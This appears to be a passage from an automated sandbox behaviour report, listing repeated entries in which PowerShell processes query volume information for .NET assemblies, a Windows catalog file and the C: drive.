Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
